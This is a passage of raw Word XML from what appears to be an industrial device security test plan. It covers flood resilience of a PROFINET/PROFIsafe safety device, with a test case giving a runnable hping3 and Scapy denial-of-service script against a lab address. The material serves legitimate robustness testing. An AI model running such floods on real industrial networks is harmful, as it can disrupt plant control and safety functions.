              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>characterizes</w:t>
            </w:r>
            <w:r w:rsidRPr="008D0F54">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> G-1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C245EAB" w14:textId="77777777" w:rsidR="008D0F54" w:rsidRPr="008F3EF7"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F3EF7">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">OWASP FSTM Stage 7; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6043C6FD" w14:textId="77777777" w:rsidR="008D0F54" w:rsidRPr="008F3EF7"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F3EF7">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">ifm CM-010 (boofuzz); </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BCAEB9C" w14:textId="5A5093D2" w:rsidR="00B73A1A" w:rsidRPr="008F3EF7"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F3EF7">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>MITRE T0836</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02BD81FD" w14:textId="44135B6D" w:rsidR="00B73A1A" w:rsidRPr="008F3EF7"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F3EF7">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV-4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00035F89" w14:paraId="34055E95"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4C66EA10" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41ABD09E" w14:textId="77777777" w:rsidR="00D01128" w:rsidRPr="00D01128" w:rsidRDefault="001375D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01128">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>IoT-Core application-layer flood</w:t>
            </w:r>
            <w:r w:rsidR="0035369B" w:rsidRPr="00D01128">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D01128">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">request flood; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="232E4A7F" w14:textId="6166D951" w:rsidR="00B73A1A" w:rsidRPr="003F2591" w:rsidRDefault="001375D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01128">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>confirm COM-path attack does not reach the safety path (domain separation)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41ECA614" w14:textId="4B3A97D6" w:rsidR="00B73A1A" w:rsidRPr="00D01128" w:rsidRDefault="00AD120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01128">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Confirms Asset F resilience</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7AA7BEAB" w14:textId="77777777" w:rsidR="00D01128" w:rsidRPr="00AE755A"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AE755A">
              <w:t xml:space="preserve">ifm CM-009 (Siege); </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15738089" w14:textId="77777777" w:rsidR="00AE755A" w:rsidRPr="00AE755A"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AE755A">
              <w:t xml:space="preserve">NIST SP 800-115 §4.3; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EAC3318" w14:textId="41026F45" w:rsidR="00B73A1A" w:rsidRPr="00AE755A"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AE755A">
              <w:t>MITRE T0814</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F30F3CA" w14:textId="312F54AC" w:rsidR="00B73A1A" w:rsidRPr="00AE755A"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E755A">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV-3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="008171E4" w14:paraId="20C0C4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D0A3792" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C02B3C8" w14:textId="37E17150" w:rsidR="00B73A1A" w:rsidRPr="00F302AB" w:rsidRDefault="00F302A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302AB">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Outcome-verification harness (aggregate): for Tests 2</w:t>
            </w:r>
            <w:r w:rsidRPr="00F302AB">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidRPr="00F302AB">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4 + imported TC-RQ001-02 and TC-RQ005-03, confirm outputs = Low + qualifier bad (CR 3.6), else flag hazardous</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2EB7CE08" w14:textId="1BECE42F" w:rsidR="00B73A1A" w:rsidRPr="003A4C99" w:rsidRDefault="0007449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A4C99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>The EHSR success criterion; surfaces G-3 exception</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F50F007" w14:textId="36025181" w:rsidR="00B73A1A" w:rsidRPr="003A4C99"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A4C99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Requirements-based + threat-mitigation; PROFIsafe passivation theory</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C67E298" w14:textId="77777777" w:rsidR="00E60591" w:rsidRPr="003A4C99" w:rsidRDefault="00E60591" w:rsidP="00E60591">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186CCB52" w14:textId="7A3AB785" w:rsidR="00B73A1A" w:rsidRPr="003A4C99" w:rsidRDefault="003A4C99" w:rsidP="00263670">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SVV</w:t>
            </w:r>
            <w:r w:rsidR="00263670">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidR="00E60591" w:rsidRPr="003A4C99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5AA360F7" w14:textId="07B5A297" w:rsidR="009C0A46" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48CBBCAC" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B11DD43" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRPr="00DB074F" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:commentRangeStart w:id="14"/>
      <w:r w:rsidRPr="00DB074F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB074F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Two-Level Test Catalog</w:t>
      </w:r>
      <w:commentRangeEnd w:id="14"/>
      <w:r w:rsidR="00E60591" w:rsidRPr="00DB074F">
        <w:rPr>
          <w:rStyle w:val="Kommentarzeichen"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:commentReference w:id="14"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A40C5DB" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B3FBC20" w14:textId="7EC9E96A" w:rsidR="009C0A46" w:rsidRDefault="00092A2E" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D73D4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">TC-RQ010-02 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00D73D4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PROFINET/L2 Flood Resilience</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D539E2"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4494F8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1A5F87" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7CCFA25E"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25ADD7A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14902A" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Test Case ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09EB5F25" w14:textId="11138921" w:rsidR="00B73A1A" w:rsidRPr="003F2591" w:rsidRDefault="002C797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C7979">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TC-RQ010-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="001604A0" w14:paraId="673577F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936C08B"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648541AD" w14:textId="773BD137" w:rsidR="00B73A1A" w:rsidRPr="003F2591" w:rsidRDefault="006015D0"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015D0">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:t>RQ-010 → CR 7.1(RE1) / CR 7.2 / CR 3.6 → Asset H, Asset A, Asset F, Asset E</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00D67CA6" w14:paraId="77F294F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492591" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Target Threat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5632DA6E" w14:textId="2B51575D" w:rsidR="00B73A1A" w:rsidRPr="003F2591" w:rsidRDefault="006015D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Denial of Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w14:paraId="7675EE0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04A7E62" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34DF52BD" w14:textId="60146C40" w:rsidR="00B73A1A" w:rsidRPr="003F2591" w:rsidRDefault="006015D0"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SVV-4 (Penetration Testing)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00EE7A74" w14:paraId="05E2851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5398CCA" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2BDAD9CE" w14:textId="6E64498A" w:rsidR="00B73A1A" w:rsidRPr="003F2591" w:rsidRDefault="005D5D46"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D5D46">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Determine behaviour under a high-rate network flood on the OT segment: (a) maintain safe communication (Net Load Class III robustness), (b) passivate to the defined safe state, or (c) enter an undefined/hazardous state? And does sustained flooding cause continuous forced passivation (availability impact)?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00EE7A74" w14:paraId="589820A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E176664" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="361039CA" w14:textId="77777777" w:rsidR="00354E54" w:rsidRDefault="00354E5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54E54">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">1. Establish OPERATE. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5006B019" w14:textId="77777777" w:rsidR="00354E54" w:rsidRDefault="00354E5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54E54">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">2. Apply an escalating frame flood (unicast 0x8892 + broadcast storm). </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F924DE4" w14:textId="77777777" w:rsidR="00354E54" w:rsidRDefault="00354E5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54E54">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">3. Continuously monitor PROFIsafe qualifier, output state, device state. 4. Sustain the flood; measure recovery vs continuous passivation. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42BFF148" w14:textId="2B9EA0F9" w:rsidR="00B73A1A" w:rsidRPr="003F2591" w:rsidRDefault="00354E5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54E54">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>5. Stop; confirm acknowledged re-integration.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00FD6890" w14:paraId="7E9E1C6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29D480" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Pass/Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="62CA1BEC" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRPr="003F2591" w:rsidRDefault="00B73A1A"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12B38172" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRPr="00AF57B2" w:rsidRDefault="00B73A1A" w:rsidP="00B73A1A">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B799B8E"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3CF05D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513F59" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6EF80BFA"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044EBA2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2F6111" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Ref. Test Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70ABA7BC" w14:textId="7FC5A5DB" w:rsidR="00B73A1A" w:rsidRPr="003F2591" w:rsidRDefault="00393E2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93E24">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TC-RQ010-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00EE7A74" w14:paraId="03FF0B8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74DF1" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5985FB1A" w14:textId="4712FEF2" w:rsidR="00B73A1A" w:rsidRPr="003F2591" w:rsidRDefault="00D212D2"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212D2">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Pi eth0 = 192.168.0.100 (flood source); SPS 192.168.0.1; DUT 192.168.0.2; laptop mirror; DO→PLC DI readback</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00EE7A74" w14:paraId="6CBE1A1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6945C1" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="63A5DA8C" w14:textId="7AEE68B8" w:rsidR="00B73A1A" w:rsidRPr="003F2591" w:rsidRDefault="00841BC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41BC9">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Scapy / hping3 / packeth (Pi); Wireshark (laptop); PLC watch-table</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00FD6890" w14:paraId="2AE0397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3FC5134" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C6DBA07"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 TC-RQ010-02 Escalating PROFINET/L2 flood; safe-state vs undefined-state</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78867C20"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for pps in 1000 10000 50000 100000; do</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A54D2CE"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echo "[*] flood @ ${pps} pps"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03281A5B"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sudo timeout 30 hping3 -q -i u$((1000000/pps)) --rand-source -2 -p 34964 192.168.0.2 &amp;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3487CFA7"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sudo python3 - &lt;&lt;'PY' &amp;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59361528"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from scapy.all import Ether, Raw, sendp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0AD6880F"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f=Ether(dst="ff:ff:ff:ff:ff:ff", type=0x8892)/Raw(b"\x00"*46)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="632E69D5"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sendp(f, iface="eth0", count=300000, inter=0.00001, verbose=0)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="069F0E0A"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PY</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1EEA3A33"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sleep 35; sudo pkill -f hping3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1AC78295"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 record: PROFIsafe qualifier, DO state (via PLC), device operatingstate</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11C4182D" w14:textId="72E94F9D" w:rsidR="00B73A1A" w:rsidRPr="003F2591"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done</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00EE7A74" w14:paraId="5B715F3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0A1A4B" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Expected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="599F9DB0" w14:textId="27F3915F" w:rsidR="00B73A1A" w:rsidRPr="003F2591" w:rsidRDefault="008B4807" w:rsidP="008B4807">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8B4807">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Safe comms maintained up to Net Load Class III limits (SRIO-1916); beyond → passivation to Low/qualifier-bad; no undefined/unsafe output; sustained flood → continuous passivation (G-2).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00EE7A74" w14:paraId="5EDB0E89"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75FECD3" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="260D1493" w14:textId="258362BF" w:rsidR="00B73A1A" w:rsidRPr="003F2591" w:rsidRDefault="008B4807"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Safe at all levels/ Passivation (safe)/ Continous passivation</w:t>
            </w:r>
            <w:r w:rsidR="0037376D">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>/ Undefined/unsafe (FAIL)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00EE7A74" w14:paraId="1854786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4C99462" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
